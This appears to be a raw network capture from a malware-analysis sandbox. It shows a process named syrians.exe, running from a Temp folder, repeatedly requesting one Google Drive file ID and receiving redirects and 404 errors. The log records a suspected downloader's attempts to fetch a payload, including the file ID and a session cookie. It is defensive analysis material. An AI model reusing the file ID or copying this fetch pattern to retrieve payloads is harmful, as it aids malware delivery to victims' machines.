2025-01-11 04:10:18 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:18 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-2fry5tWbNf3_T3YrWgWp8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	54070	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:19 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:19 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTNXtB9k2jPYxbsmStKflIAOm0cYZjJgVArdeVMZaFDiS9lvU_5ae2o4YZqPM_JZl2C7w1OPWc Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:19 GMT Content-Security-Policy: script-src 'nonce-O_w9ITB3uFY6AKkr6kEaxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:19 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 36 72 75 39 68 49 68 56 6c 61 65 6b 4a 42 30 37 4f 61 4e 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="36ru9hIhVlaekJB07OaNlQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	54071	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:20 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:20 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:20 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-1361lvcvTwwzAWmv6aIBHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	54072	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:21 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:21 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRxBHL0fy4D2ymoZmJ_NsrFAKLtdFBsXkfeKC4mxGIkpAkfPD5EjOvigivnWc2276d0 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:21 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-reuN57xqMAU1ZX6PpEPPzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:21 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 67 78 58 50 4a 4b 4b 2d 44 36 76 48 73 36 62 46 6b 4a 51 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ggxXPJKK-D6vHs6bFkJQOQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	54073	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:22 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:22 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:22 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-3cMmZdO2Um2wR7zcoo5fPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	54074	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:23 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:24 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTJbE7s8Fr0VH_XIygnSYPA1aI5cS0aJEr-9pyS1Rr51D3mq6mzzeVWahVHfd-H70w7xEbLQZA Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:23 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-WSoUthiWLoS__dDDTy1trA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:24 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 35 63 77 64 36 79 59 37 31 56 48 4a 43 2d 43 46 45 6e 71 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y5cwd6yY71VHJC-CFEnqfA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	54075	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:24 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:25 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:25 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce--GMnA8ojizwOqBGKYfXVRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	54076	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:26 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:26 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSActSuqcwsnmHyAwvoDHt1dmJHfRuVSh2ItwTiZcyCoAxUHs_aj5sRV_CoCcMq_Qm40CxVhPE Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:26 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-aH5F5hA5MKK08SavGXj1eA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:26 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 2d 65 31 36 4b 65 78 42 63 65 61 42 4d 54 51 77 4f 71 42 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8-e16KexBceaBMTQwOqBpw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	54077	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:27 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
